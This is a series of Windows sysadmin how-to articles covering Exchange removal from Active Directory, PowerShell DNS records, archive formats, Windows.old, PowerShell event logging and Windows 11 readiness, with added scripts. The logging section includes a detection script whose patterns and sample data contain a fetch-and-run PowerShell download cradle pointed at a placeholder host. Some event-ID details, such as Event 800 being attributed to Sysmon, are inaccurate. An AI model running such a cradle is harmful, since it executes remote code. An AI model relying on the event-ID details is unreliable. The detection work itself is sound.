Manually Remove Exchange

Manually Remove Exchange KB ID 0001907

Problem

There are several reasons why you might want to manually remove Exchange from Active Directory, for example:

Failed or Offline Exchange Server: If the Exchange Server is not starting, (or is completely offline), it might be necessary to remove it manually to clean up the environment.

Incomplete Uninstallation: Sometimes, the uninstallation doesn’t complete properly, leaving behind remnants that can cause issues.

Migration to a Newer Version: After migrating to a newer version of Exchange, or migrating to Office 365, you may need to remove old configurations to avoid problems.

Corruption: If the Exchange Server is corrupted or cannot be recovered, manual removal might be the only option.

Removing Old References: To ensure that no legacy references to the previous Exchange Server remain, which could interfere with new installations.

Solution Manually Remove Exchange

Before you start, ensure there are no remaining Exchange servers in your organization that rely on the one you are removing. If migrating to another Exchange server, verify mailboxes, connectors, and databases have been transferred properly.

Also consider trying to recover the Exchange server, and then removing it gracefully, or performing a migration.

Safely Remove Exchange

If you do not have access to the Exchange Management Shell, and the server still exists, you can mount the installation media for Exchange and run the following command. Note: You do not actually need the media; if you locate the ‘bin‘ folder on your Exchange server you will find setup.exe* in there, and can run the uninstall command from that location.

*Note: Older versions of Exchange may need to use setup.com not setup.exe.

[box]

setup.exe /mode:uninstall

[/box]

Manually Remove Exchange Server

On a domain controller open ADSI Edit (adsiedit.msc) > Right-click ADSI Edit > Connect to… > In “Select a well-known Naming Context” choose Configuration > Click OK.

Navigate to CN=Configuration,DC=YourDomain,DC=com > CN=Services > CN=Microsoft Exchange > CN=First Organization > CN=Administrative Groups > CN=Exchange Administrative Group (FYDIBOHF23SPDLT) > CN=Servers.

Note: This assumes you have not named your Exchange organisation or administrative group something else.

Locate the offending Exchange server, and delete it.

Repeat the above procedure but this time remove any databases that were hosted on the failed server.

Manually Remove Exchange Environment Completely

Now, if you want to COMPLETELY remove Exchange* from your organisation, delete the following:

*Note: Don’t do this if you still have live Exchange servers!

Delete: CN=Configuration,DC=YourDomain,DC=com > CN=Services > CN=Microsoft Exchange

Delete: CN=Configuration,DC=YourDomain,DC=com > CN=Services > CN=Microsoft Exchange AutoDiscover

Now connect ADSIEdit to the Default Naming Context.

Navigate to DC=YOUR-DOMAIN and locate

OU=Microsoft Exchange Security Groups
CN=Microsoft Exchange System Objects

Then delete them BOTH

 

On a domain controller, or a system that has the RSAT tools installed, launch Active Directory Users and Computers (dsa.msc). Navigate to your domain > Users. Then locate and delete the following objects.

  • DiscoverySearch Mailbox {GUID}
  • Exchange Online-ApplicationAccount
  • FederatedEmail.GUID
  • Migration.GUID
  • SystemMailbox {GUID}

Now, whilst still in AD Users and Computers, locate the computer object that represents the failed Exchange server and delete it. (Obviously, if you are retaining the server for other purposes, do not do this.)

Note: If you search AD, you will need to add Computers to the default search object types.

Then remove the DNS entry in your DNS forward lookups zone (Check your reverse lookup zones and see if there’s a PTR record in there also that might need deleting).

IN SOME CASES, if you have deployed split DNS, you may have entire zones that handle DNS addressing for your broken Exchange deployment; below is an example of what that may look like. These will also need to be removed.

Note: You may discover an autodiscover.your-domain forward lookup zone that also may need to be deleted.

Manually Delete Exchange From Registry

If you still have access to the server that’s failed, you can remove references to Exchange from its registry in the following locations.

HKEY_LOCAL_MACHINE > Software > Microsoft > ExchangeServer.

HKEY_LOCAL_MACHINE > System > CurrentControlSet > Services > MSExchange* (there will be a LOT!)

If you have retained Exchange, and were simply removing a single failed Exchange server, your other Exchange servers may have cached references to that failed server. You can restart the Microsoft Exchange Information Store (MSExchangeIS) service. Warning: This will dismount and remount the information stores, and may cause a popup on your Outlook clients. Or you can simply wait until the cache is refreshed.
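Before deleting anything in ADSI Edit it is worth listing what is actually left behind. The following is an added, read-only inventory script (not from the original article); it assumes the ActiveDirectory and DnsServer RSAT modules are installed, the default organisation/administrative group names shown above, and a hypothetical server name of EX-01.

```powershell
# Added example: inventory the Exchange objects the manual procedure above deletes.
# Nothing here changes AD; it only reports what still references the failed server.
Import-Module ActiveDirectory

function Get-ExchangeLeftovers {
    param(
        [Parameter(Mandatory)][string]$ServerName,                        # e.g. 'EX-01' (hypothetical)
        [string]$OrganizationName = 'First Organization',
        [string]$AdminGroup = 'Exchange Administrative Group (FYDIBOHF23SPDLT)'
    )
    $rootDse      = Get-ADRootDSE
    $configNC     = $rootDse.configurationNamingContext
    $defaultNC    = $rootDse.defaultNamingContext
    $exchangeRoot = "CN=Microsoft Exchange,CN=Services,$configNC"
    $adminGroupDN = "CN=$AdminGroup,CN=Administrative Groups,CN=$OrganizationName,$exchangeRoot"

    $result = [ordered]@{}

    # 1. Server objects under CN=Servers (the object you delete in ADSI Edit)
    $result.Servers = Get-ADObject -SearchBase "CN=Servers,$adminGroupDN" -SearchScope OneLevel `
        -Filter 'objectClass -eq "msExchExchangeServer"' -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty Name

    # 2. Mailbox databases and the server each one is owned by (msExchOwningServer)
    $result.Databases = Get-ADObject -SearchBase "CN=Databases,$adminGroupDN" -SearchScope OneLevel `
        -Filter 'objectClass -eq "msExchPrivateMDB"' -Properties msExchOwningServer -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{ Database = $_.Name; OwningServer = $_.msExchOwningServer }
        }

    # 3. The system/arbitration accounts the article lists under domain > Users
    $result.SystemAccounts = Get-ADUser -Filter * -SearchBase "CN=Users,$defaultNC" |
        Where-Object { $_.Name -match '^(SystemMailbox|DiscoverySearchMailbox|FederatedEmail|Migration|Exchange Online-ApplicationAccount)' } |
        Select-Object -ExpandProperty Name

    # 4. Computer object and forward DNS A record for the failed server
    $result.ComputerObject = [bool](Get-ADComputer -Filter "Name -eq '$ServerName'")
    $domain = (Get-ADDomain).DNSRoot
    $result.DnsARecord = [bool](Get-DnsServerResourceRecord -ZoneName $domain -Name $ServerName -RRType A -ErrorAction SilentlyContinue)

    [pscustomobject]$result
}

# Usage: review the output, then delete in ADSI Edit / ADUC / DNS as described above
Get-ExchangeLeftovers -ServerName 'EX-01' | Format-List
```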

 

Related Articles, References, Credits, or External Links

NA

PowerShell DNS Records (Creating)

 PowerShell DNS KB ID 0001906

Problem

You can use PowerShell to create DNS records in a Windows environment; this is typically done on a Windows Server OS that is running DNS services. Below are some methods (depending on whether you’re managing an Active Directory-integrated DNS zone or a standalone DNS server) to do this.

Solution

PowerShell DNS: Creating an A Record (Host Record)

To add an A record (IPv4 address) to a DNS zone, use the following syntax.

[box]

Add-DnsServerResourceRecordA -Name "my-server" -ZoneName "pnl.com" -IPv4Address "192.168.100.101"

[/box]

PowerShell DNS: Creating an AAAA Record (IPv6 Host Record)

To add an AAAA record (IPv6 address) to a DNS zone, use the following syntax.

[box]

Add-DnsServerResourceRecordAAAA -Name "my-server" -ZoneName "pnl.com" -IPv6Address "2001:db8::2"

[/box]

PowerShell DNS: Creating a CNAME Record (Canonical Name Record)

To add a CNAME record (an alias that points at an existing host name) to a DNS zone, use the following syntax.

[box]

Add-DnsServerResourceRecordCName -Name "www" -ZoneName "pnl.com" -HostNameAlias "my-server.pnl.com"

[/box]

PowerShell DNS: Creating an MX Record (Mail Exchange)

To add an MX record for mail delivery to a DNS zone, use the following syntax. Note: This will create an MX record with a priority of 10.

[box]

Add-DnsServerResourceRecordMX -ZoneName "pnl.com" -Name "@" -MailExchange "mail-01.pnl.com" -Preference 10

[/box]

PowerShell DNS: Creating a PTR Record (Reverse DNS)

To add a PTR record (a reverse DNS lookup record), use the following syntax. Note: This assumes you already have a reverse lookup zone created.

[box]

Add-DnsServerResourceRecordPTR -Name "101" -ZoneName "100.168.192.in-addr.arpa" -PtrDomainName "my-server.pnl.com"

[/box]

Note: This creates a PTR Record for 192.168.100.101 that points back to my-server.pnl.com.

PowerShell DNS: Creating a TXT Record (For SPF, DKIM, etc.)

To add a TXT record, use the following syntax. Note: An SPF record for the domain itself must sit at the zone apex, hence -Name "@".

[box]

Add-DnsServerResourceRecord -Txt -Name "@" -ZoneName "pnl.com" -DescriptiveText "v=spf1 mx -all"

[/box]

Using PowerShell for DNS record creation helps streamline the administrative workload, improves consistency, and reduces the potential for errors, especially in larger environments. It’s an efficient, flexible, and scalable solution that can significantly enhance the management and automation of DNS infrastructure. Whether for one-off record creation or bulk updates, PowerShell is a powerful tool for IT administrators.
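For the bulk case, here is an added example (not from the original article) that feeds a CSV of host names and addresses through the same cmdlets shown above. It skips hosts that already have an A record and creates the matching PTR only when the reverse lookup zone exists; the CSV content, zone name and addresses are constructed sample values, and it assumes the DnsServer module is available.

```powershell
# Added example: bulk A + PTR creation with existence checks, built on the cmdlets above.
# The CSV below is constructed sample data; in practice use Import-Csv on a real file.
$csvText = @'
Name,IPv4Address
my-server,192.168.100.101
web-01,192.168.100.102
'@
$records = $csvText | ConvertFrom-Csv

function Get-ReverseZoneName {
    # 192.168.100.101 -> '100.168.192.in-addr.arpa' (assumes /24 reverse zones)
    param([Parameter(Mandatory)][string]$IPv4Address)
    $octets = $IPv4Address.Split('.')
    '{0}.{1}.{2}.in-addr.arpa' -f $octets[2], $octets[1], $octets[0]
}

function Add-HostRecordSet {
    param(
        [Parameter(Mandatory)][string]$ZoneName,
        [Parameter(Mandatory)][object[]]$Records
    )
    foreach ($r in $Records) {
        # Idempotency: do not clobber or duplicate an existing A record
        $existing = Get-DnsServerResourceRecord -ZoneName $ZoneName -Name $r.Name -RRType A -ErrorAction SilentlyContinue
        if ($existing) {
            Write-Warning "$($r.Name).$ZoneName already has an A record ($($existing.RecordData.IPv4Address)); skipping"
            continue
        }
        Add-DnsServerResourceRecordA -Name $r.Name -ZoneName $ZoneName -IPv4Address $r.IPv4Address

        # Create the PTR only if the reverse zone exists, otherwise the cmdlet would error out
        $reverseZone = Get-ReverseZoneName -IPv4Address $r.IPv4Address
        if (Get-DnsServerZone -Name $reverseZone -ErrorAction SilentlyContinue) {
            $lastOctet = $r.IPv4Address.Split('.')[3]
            Add-DnsServerResourceRecordPtr -Name $lastOctet -ZoneName $reverseZone -PtrDomainName "$($r.Name).$ZoneName"
        } else {
            Write-Warning "Reverse zone $reverseZone does not exist; no PTR created for $($r.IPv4Address)"
        }
    }
}

Add-HostRecordSet -ZoneName 'pnl.com' -Records $records
```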

Related Articles, References, Credits, or External Links

Setting up the Correct DNS Records for your Web or Mail Server

Add-DnsServerResourceRecord

Windows Server 2025 Compression Options

2025 Compression KB ID 0001905

Problem

In Windows Server 2025, you may notice there are some more ‘compression’ options.

In previous versions of Windows Server we simply had Send to > Compressed (Zipped) Folder. As you can see above, we now have options for ZIP, 7z, and TAR File.

Solution : 2025 Compression

ZIP Files

The .zip file format is one of the most common archive formats in the world, widely used for compressing and packaging files. Developed in 1989 by Phil Katz (founder of PKWARE), .zip allows multiple files and directories to be bundled into a single file, reducing storage size and simplifying file sharing.

Key Features of .ZIP Files in 2025 Compression

Compression: The .zip format uses lossless compression algorithms, most commonly Deflate, which means no data is lost during compression. Once extracted, the files retain their original quality and structure.

Archiving: .zip files can store multiple files and folder structures in a single package, making it easier to manage or share a group of files.

Password Protection: .zip files can include encryption (e.g., AES-256) to protect their contents with a password, useful for sensitive data.

Cross-Platform Support: Supported natively by most modern operating systems (e.g., Windows, macOS, and Linux), .zip files are widely recognized and easy to handle.

Splitting (Spanned Archives): Large .zip files can be split into smaller parts for easier distribution (e.g., email attachments).

How .ZIP Files Work

A .zip file contains the following key elements.

  • File Header: Contains metadata about each file (e.g., file name, size, timestamp).
  • Compressed Data Blocks: The actual compressed contents of the files.
  • Central Directory: A table of contents for all files in the archive, allowing quick access during extraction.
  • End of Central Directory Record (EOCD): Marks the end of the archive, ensuring integrity.

Pros:

  • Reduces file size, saving disk space
  • Groups multiple files for easier sharing
  • Native support across platforms

Cons:

  • Compression ratio varies by file type (e.g., videos compress poorly)
  • Does not support incremental updates like .tar.gz or .7z
  • Password protection isn’t always secure without strong encryption
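To see those structures for real, here is an added example (not from the original article) that reads a .zip file’s End of Central Directory record and walks the Central Directory, reporting each entry’s compression method and whether it is encrypted, and with what. That last point is the practical check behind the “password protection isn’t always secure” caveat: the encrypted flag on its own means legacy ZipCrypto, whereas method 99 plus a 0x9901 extra field means AES. It builds its own sample archive in $env:TEMP so it runs stand-alone.

```powershell
# Added example: parse the EOCD and Central Directory of a zip file.
Add-Type -AssemblyName System.IO.Compression, System.IO.Compression.FileSystem

function Get-ZipCentralDirectory {
    param([Parameter(Mandatory)][string]$Path)
    $b = [System.IO.File]::ReadAllBytes($Path)

    # EOCD (signature 0x06054b50) is at the end, preceded only by an optional comment of up to 65535 bytes
    $eocd = -1
    for ($i = $b.Length - 22; $i -ge [Math]::Max(0, $b.Length - 22 - 65535); $i--) {
        if ([BitConverter]::ToUInt32($b, $i) -eq 0x06054b50) { $eocd = $i; break }
    }
    if ($eocd -lt 0) { throw "No End of Central Directory record found: not a zip file" }

    $entryCount = [BitConverter]::ToUInt16($b, $eocd + 10)   # total entries in the central directory
    $cdOffset   = [BitConverter]::ToUInt32($b, $eocd + 16)   # where the central directory starts

    $methods = @{ 0 = 'Store'; 8 = 'Deflate'; 9 = 'Deflate64'; 12 = 'BZip2'; 14 = 'LZMA'; 93 = 'Zstd'; 99 = 'AES' }
    $pos = $cdOffset
    for ($n = 0; $n -lt $entryCount; $n++) {
        if ([BitConverter]::ToUInt32($b, $pos) -ne 0x02014b50) { throw "Bad central directory header at offset $pos" }
        $flags      = [BitConverter]::ToUInt16($b, $pos + 8)    # bit 0 = encrypted
        $method     = [BitConverter]::ToUInt16($b, $pos + 10)
        $crc        = [BitConverter]::ToUInt32($b, $pos + 16)
        $csize      = [BitConverter]::ToUInt32($b, $pos + 20)
        $usize      = [BitConverter]::ToUInt32($b, $pos + 24)
        $nameLen    = [BitConverter]::ToUInt16($b, $pos + 28)
        $extraLen   = [BitConverter]::ToUInt16($b, $pos + 30)
        $commentLen = [BitConverter]::ToUInt16($b, $pos + 32)
        $name = [Text.Encoding]::UTF8.GetString($b, $pos + 46, $nameLen)

        # Encrypted bit alone = legacy ZipCrypto; the WinZip AES extra field (id 0x9901) upgrades that verdict
        $encryption = if ($flags -band 1) { 'ZipCrypto (weak)' } else { 'None' }
        $e = $pos + 46 + $nameLen
        $end = $e + $extraLen
        while ($e + 4 -le $end) {
            $id   = [BitConverter]::ToUInt16($b, $e)
            $size = [BitConverter]::ToUInt16($b, $e + 2)
            if ($id -eq 0x9901 -and $size -ge 7) {
                $strength   = @{ 1 = 128; 2 = 192; 3 = 256 }[[int]$b[$e + 8]]
                $encryption = "AES-$strength"
                $method     = [BitConverter]::ToUInt16($b, $e + 9)   # real method lives inside the AES header
            }
            $e += 4 + $size
        }

        $methodName = $methods[[int]$method]
        if (-not $methodName) { $methodName = "Unknown ($method)" }
        [pscustomobject]@{
            Name = $name; Method = $methodName; Encryption = $encryption
            Compressed = $csize; Uncompressed = $usize; CRC32 = ('{0:X8}' -f $crc)
        }
        $pos += 46 + $nameLen + $extraLen + $commentLen
    }
}

# Constructed sample archive (Deflate, unencrypted) so the parser can be run immediately
$work = Join-Path $env:TEMP ('zipdemo-' + [guid]::NewGuid())
New-Item -ItemType Directory -Path $work | Out-Null
Set-Content -Path (Join-Path $work 'readme.txt') -Value ('hello ' * 500)
$zip = "$work.zip"
[System.IO.Compression.ZipFile]::CreateFromDirectory($work, $zip)

Get-ZipCentralDirectory -Path $zip | Format-Table -AutoSize
Remove-Item $work -Recurse -Force; Remove-Item $zip -Force
```

Point it at a third-party “password protected” archive to see whether the entries report AES-256 or ZipCrypto before relying on it.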

7z Files

The .7z file format is a high-compression archive format introduced in 1999 with the open-source 7-Zip software, developed by Igor Pavlov. Known for its impressive compression ratios and support for advanced features like strong encryption and multi-threading, .7z is a popular choice for power users and IT professionals.

Key Features of .7z Files in 2025 Compression

Superior Compression: .7z uses the LZMA (Lempel-Ziv-Markov chain algorithm) or its advanced version, LZMA2, which offers higher compression ratios compared to .zip and many other formats.

Multi-Format Support: .7z supports various compression, encryption, and pre-processing filters, making it highly versatile for different file types.

Strong Encryption: .7z files use AES-256 encryption for password protection, providing robust security for sensitive data.

Splitting (Volumes): Large .7z archives can be split into smaller parts (e.g., for storage on multiple media or sending via email).

Open-Source and Cross-Platform: While .7z isn’t natively supported by operating systems, free tools like 7-Zip and p7zip make it accessible on Windows, macOS, and Linux.

How .7z Files Work

A .7z file contains the following components:

  • Header: Stores metadata (e.g., file names, sizes, compression methods).
  • Compressed Data Blocks: The core data is compressed using the chosen algorithm (usually LZMA or LZMA2).
  • Encryption (Optional): Data and metadata can be encrypted for additional security.

Pros:

  • High compression ratio (saves more space)
  • Strong AES-256 encryption for security
  • Supports splitting for large files
  • Open-source and free

Cons:

  • Used to require third-party tools for extraction
  • Slightly slower compression than .zip
  • Not natively supported by OSs (less universal)
  • Advanced features may overwhelm casual users

TAR Files

The .tar file format, short for Tape Archive, is one of the oldest and most widely used formats for archiving files. Originally developed in the Unix ecosystem for storing files on magnetic tape, .tar remains popular today, especially in Linux environments, for grouping multiple files into a single archive.

Key Features of .TAR Files in 2025 Compression

Archiving, Not Compression: Unlike .zip or .7z, .tar files do not compress the contents—they simply bundle files and directories into a single archive for easier management.

Preserves File Metadata: .tar preserves essential file information, including permissions, ownership, timestamps, and symbolic links, making it ideal for backups and system migrations.

Streamable: Because .tar writes data sequentially, it can be used efficiently with pipes, enabling workflows like direct compression or streaming backups to remote locations.

Cross-Platform: While commonly associated with Unix/Linux, .tar files are supported on Windows and macOS via tools like WinRAR, 7-Zip, or native utilities.

How .TAR Files Work

A .tar file contains the following:

  • Headers: Metadata for each file (e.g., names, permissions, sizes).
  • File Data Blocks: The raw contents of the files, concatenated in the archive.
  • End Marker: Indicates the end of the archive.

Note: The .tar format does not include compression—it is often combined with compression algorithms like gzip or bzip2 to create compressed archives (e.g., .tar.gz, .tar.bz2).

Pros:

  • Ideal for archiving files with metadata intact
  • Simple and efficient for backups
  • Works seamlessly with Unix/Linux utilities

Cons:

  • Does not compress data (unless combined with gzip, etc.)
  • Sequential access: extracting specific files requires scanning the entire archive
  • No encryption or security by default

Comparing Server 2025 Compression Options

I’ve used a blend of files that can easily be compressed, and others that cannot to get a decent approximation of what you might expect. Remember .tar does not compress, so it’s more or less the size of the original folder.

Server 2025 Compress To > Additional Options

Using the last option you can select which format to use, which method(s) to apply, and whether you want to compress faster or smaller. You can gain some space this way, but the defaults are pretty good.

Related Articles, References, Credits, or External Links

NA

Can I delete Windows.old?

Can I delete Windows.old KB ID 0001904

Problem

The Windows.old folder is generated when you reinstall or upgrade Windows without formatting the drive. Here are some scenarios that would have created it.

  • Upgrading Windows: When you upgrade to a newer version of Windows (e.g., from Windows 10 to Windows 11), the system creates the Windows.old folder to back up your previous installation. This allows you to roll back to the earlier version if something goes wrong or if you’re not satisfied with the upgrade.
  • Reinstalling Windows: If you reinstall Windows without performing a clean installation (i.e., without formatting the drive), the system creates Windows.old to back up your previous installation, including your system files, installed programs, and personal data.
  • Windows Reset or Refresh: When you reset or refresh your PC, some versions of Windows (e.g., Windows 10/11) may create Windows.old to store your previous system state temporarily.
  • System Recovery: Performing a recovery operation (e.g., restoring from a recovery drive) without wiping the disk can also generate Windows.old.

The folder serves as a safety net to:

  • Roll back to the previous version of Windows (within 10 days for Windows 10/11).
  • Recover personal files or settings if needed.

So if you need the drive space back, or simply do not think you need it anymore, can you safely delete/remove it?

Solution

Yes, you can safely delete the Windows.old folder, but only if you’re sure you won’t need to revert to a previous version of Windows. Here’s what you need to know before deleting it:

Why Would You NOT Want to Delete Windows.old?

  • Revert to a previous version: You can use it to roll back to your old version of Windows within 10 days of the upgrade.
  • Recover personal files: If anything went missing during the upgrade, you might find it in Windows.old.

How to delete Windows.old safely

You can’t delete it like a normal folder. Use the Disk Cleanup tool:

Press Win + S and type Disk Cleanup, then select it.

Click Clean up system files.

Select Previous Windows Installation(s).

Click OK to delete it.

Related Articles, References, Credits, or External Links

NA

Logging Powershell Execution

Logging PowerShell KB ID 0001903

Problem

Monitoring PowerShell execution, (especially on critical servers like domain controllers), is essential for detecting potential malicious activity. PowerShell activities generate specific Event IDs in the Windows Event Log.

Solution : Logging Powershell

The following Event IDs are logged connected to PowerShell execution.

Command Line Auditing: Event ID 800 (Microsoft-Windows-Sysmon/Operational log) (if Sysmon is configured):

  • Logs command-line activity, including PowerShell commands.

Event ID 4102: PowerShell Transcription (Microsoft-Windows-PowerShell/Operational log):

  • Tracks transcription-related activities if PowerShell transcription is enabled.

Event ID 4103: PowerShell Execution Logging (Microsoft-Windows-PowerShell/Operational log):

  • Provides detailed script block execution logs.
  • Useful for tracking command-line arguments and script contents.

Event ID 4104: Script Block Logging (Microsoft-Windows-PowerShell/Operational log):

  • Logs the actual script blocks being executed.
  • Often used to detect obfuscated or suspicious commands.

Event ID 4105: Module Logging (Microsoft-Windows-PowerShell/Operational log):

  • Tracks modules loaded by PowerShell scripts.

Event ID 4106: Pipeline Execution Details (Microsoft-Windows-PowerShell/Operational log):

  • Captures pipeline execution details, providing insights into commands executed in the pipeline.

Event ID 4688: Windows PowerShell Logs (Security log):

  • Logs when a new process is created, including PowerShell.
  • Look for processes with powershell.exe or pwsh.exe.

Logging Powershell With Group Policy

Enable Script Block Logging:

For LOCAL POLICY: Open gpedit.msc > Navigate to: Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging > Set it to Enabled. Additionally, tick the script block invocation start/stop events option to enable the logging of Event 4105 (start of a script block execution) and 4106 (end of a script block execution).

 

For DOMAIN GROUP POLICY: On a domain controller, or a machine that has the management tools installed > Administrative Tools > Group Policy Management Console, then either edit an existing policy or create a new one linked to the domain/OU that contains the COMPUTER object you want to apply this policy to, then navigate to: Computer Configuration > Policies > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging > Set it to Enabled. Additionally, tick the script block invocation start/stop events option to enable the logging of Event 4105 (start of a script block execution) and 4106 (end of a script block execution).

Logging PowerShell (Other Options)

You may also want to enable the following policies (at either LOCAL or DOMAIN level)

Enable Module Logging

Location: Administrative Templates > Windows Components > Windows PowerShell.

Lets you log the usage of particular PowerShell Modules

Enable PowerShell Transcription

Location: Administrative Templates > Windows Components > Windows PowerShell.

This policy setting lets you capture the input and output of Windows PowerShell commands into text-based transcripts.

Audit Process Creation

Location: Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Detailed Tracking > Audit Process Creation > Enable for success and failure.

This is used to enable or disable the logging of process creation events in the Windows Security log. It provides valuable information about which processes are starting on a system, including details like the process name, command line arguments, and the user who initiated the process.

Don’t forget to either wait, or force a group policy update.
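Once the policy has applied, the following added example (not from the original article) confirms that the settings above actually landed, by reading the registry keys the Group Policy settings write to, and then pulls recent Event ID 4104 script block entries and flags ones with common obfuscation traits. The sample script blocks at the end are constructed so the scoring part can be tried without a live log.

```powershell
# Added example: verify PowerShell logging policy and triage 4104 script block events.
function Get-PowerShellLoggingPolicy {
    # These are the registry locations the GPO settings above populate
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $get = { param($key, $name)
        (Get-ItemProperty -Path (Join-Path $base $key) -Name $name -ErrorAction SilentlyContinue).$name -eq 1 }
    [pscustomobject]@{
        ScriptBlockLogging  = & $get 'ScriptBlockLogging' 'EnableScriptBlockLogging'
        InvocationLogging   = & $get 'ScriptBlockLogging' 'EnableScriptBlockInvocationLogging'
        ModuleLogging       = & $get 'ModuleLogging'      'EnableModuleLogging'
        Transcription       = & $get 'Transcription'      'EnableTranscripting'
        TranscriptDirectory = (Get-ItemProperty -Path (Join-Path $base 'Transcription') -ErrorAction SilentlyContinue).OutputDirectory
    }
}

function Test-SuspiciousScriptBlock {
    # Simple heuristics for traits analysts commonly hunt for in 4104 events
    param([Parameter(Mandatory)][string]$Text)
    $reasons = @()
    if ($Text -match 'FromBase64String|-e(c|nc|ncodedcommand)\b')       { $reasons += 'encoded command' }
    if ($Text -match 'Invoke-Expression|\bIEX\b')                         { $reasons += 'Invoke-Expression' }
    if ($Text -match 'DownloadString|DownloadFile|Net\.WebClient')       { $reasons += 'web download' }
    if ($Text -match '[a-z]`[a-z]' -or $Text -match '''\+''')            { $reasons += 'tick/string-split obfuscation' }
    $symbols = ([regex]::Matches($Text, '[^A-Za-z0-9\s]')).Count
    if ($Text.Length -gt 40 -and ($symbols / $Text.Length) -gt 0.3)      { $reasons += 'high symbol density' }
    [pscustomobject]@{
        Suspicious = ($reasons.Count -gt 0)
        Reasons    = ($reasons -join ', ')
        Snippet    = $Text.Substring(0, [Math]::Min(70, $Text.Length))
    }
}

function Get-SuspiciousScriptBlocks {
    # Live path: reads the operational log; ScriptBlockText is the third property of a 4104 event
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hit = Test-SuspiciousScriptBlock -Text ([string]$_.Properties[2].Value)
            if ($hit.Suspicious) {
                [pscustomobject]@{ Time = $_.TimeCreated; Reasons = $hit.Reasons; Snippet = $hit.Snippet }
            }
        }
}

Get-PowerShellLoggingPolicy | Format-List

# Constructed sample script blocks (not real events) to exercise the scoring offline
$samples = @(
    'Get-Service | Where-Object Status -eq Running',
    'powershell -EncodedCommand QQBCAEMA',
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/script.ps1')"
)
$samples | ForEach-Object { Test-SuspiciousScriptBlock -Text $_ } | Format-Table -AutoSize

# On a machine where script block logging is on, this returns the flagged real events
Get-SuspiciousScriptBlocks -MaxEvents 200 | Format-Table -AutoSize
```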

Related Articles, References, Credits, or External Links

NA

Upgrade Windows 10 to Windows 11

Upgrade Windows 10 to Windows 11 KB ID 0001902

Problem

As you may already know, Microsoft will officially end support for Windows 10 on October 14, 2025. This means no more security updates, bug fixes, or feature improvements! While your PC will still function, it will be at greater risk for viruses and malware – and yes – that does mean businesses and home users alike. So it’s crucial to start planning your transition to Windows 11 now, especially with larger estates.
Below, I’ll cover the key considerations and upgrade paths to help you prepare.

Need Help? If you’re unsure about your upgrade path or compatibility, feel free to leave a comment below.

Why Upgrade to Windows 11

Windows 11 offers several improvements over Windows 10, including:

  • Enhanced Security: Built-in support for TPM 2.0 and Secure Boot ensures a more secure operating system.
  • Modern UI: A fresh design with centred taskbar icons and rounded corners.
  • Productivity Features: Snap layouts, virtual desktops, and better multi-monitor support.
  • Improved Gaming Experience: DirectStorage and AutoHDR support.
  • Optimised for Hybrid Work: Deeper integration with Microsoft Teams and cloud services.

As mentioned (above) with support for Windows 10 ending, you’ll also reduce your risk of vulnerabilities by upgrading.

Solution Upgrade Windows 10 to Windows 11

Key Considerations Before Upgrading to Windows 11

Hardware Compatibility

Windows 11 has stricter hardware requirements than Windows 10. Your PC must meet the following criteria:

  • Processor: 1 GHz or faster, 2 or more cores, 64-bit compatible.
  • RAM: 4 GB minimum.
  • Storage: 64 GB or more.
  • TPM: Trusted Platform Module (TPM) version 2.0.
  • Graphics Card: DirectX 12 compatible with a WDDM 2.0 driver.
  • Display: At least 720p resolution and 9″ or larger diagonal screen size.

Run the PC Health Check Tool from Microsoft to verify if your system is compatible.
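For a fleet, it helps to script the criteria listed above before scheduling in-place upgrades. The following is an added example (not from the original article) that checks the CPU, RAM, storage and TPM requirements on the local machine, plus Secure Boot; the graphics (DirectX 12 / WDDM 2.0) and display-size criteria are not cleanly exposed to PowerShell and are left to PC Health Check. The 3.5 GB RAM threshold is an assumption to allow for memory reserved by firmware on nominal 4 GB machines; run it as an administrator so the TPM and Secure Boot queries work.

```powershell
# Added example: scripted Windows 11 readiness check for the criteria listed above.
function Test-Windows11Readiness {
    $cpu     = Get-CimInstance Win32_Processor | Select-Object -First 1
    $cs      = Get-CimInstance Win32_ComputerSystem
    $sysDisk = Get-CimInstance Win32_LogicalDisk -Filter "DeviceID='$env:SystemDrive'"

    # Win32_Tpm.SpecVersion looks like "2.0, 0, 1.38"; the first token is the TPM specification version
    $tpm = Get-CimInstance -Namespace root\cimv2\Security\MicrosoftTpm -ClassName Win32_Tpm -ErrorAction SilentlyContinue
    $tpmVersion = $null
    if ($tpm) { $tpmVersion = [version]($tpm.SpecVersion.Split(',')[0].Trim()) }

    # Confirm-SecureBootUEFI throws on legacy BIOS machines (and when not elevated); treat both as not confirmed
    $secureBoot = $false
    try { $secureBoot = [bool](Confirm-SecureBootUEFI) } catch { }

    @(
        [pscustomobject]@{ Check = 'CPU >= 1 GHz';         Value = "$($cpu.MaxClockSpeed) MHz";  Pass = $cpu.MaxClockSpeed -ge 1000 }
        [pscustomobject]@{ Check = 'CPU >= 2 cores';       Value = $cpu.NumberOfCores;           Pass = $cpu.NumberOfCores -ge 2 }
        [pscustomobject]@{ Check = 'CPU 64-bit';           Value = "$($cpu.AddressWidth)-bit";   Pass = $cpu.AddressWidth -eq 64 }
        [pscustomobject]@{ Check = 'RAM >= 4 GB';          Value = ('{0:N1} GB' -f ($cs.TotalPhysicalMemory / 1GB)); Pass = $cs.TotalPhysicalMemory -ge 3.5GB }  # assumption: firmware-reserved RAM
        [pscustomobject]@{ Check = 'System disk >= 64 GB'; Value = ('{0:N0} GB' -f ($sysDisk.Size / 1GB));            Pass = $sysDisk.Size -ge 64GB }
        [pscustomobject]@{ Check = 'TPM 2.0';              Value = $(if ($tpm) { $tpm.SpecVersion } else { 'not found' }); Pass = ($null -ne $tpmVersion) -and ($tpmVersion -ge [version]'2.0') }
        [pscustomobject]@{ Check = 'Secure Boot (UEFI)';   Value = $secureBoot;                  Pass = $secureBoot }
    )
}

$result = Test-Windows11Readiness
$result | Format-Table -AutoSize
if ($result.Pass -contains $false) {
    Write-Warning 'One or more checks failed; confirm with PC Health Check before upgrading.'
} else {
    'All scripted checks passed; confirm graphics and display size with PC Health Check.'
}
```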

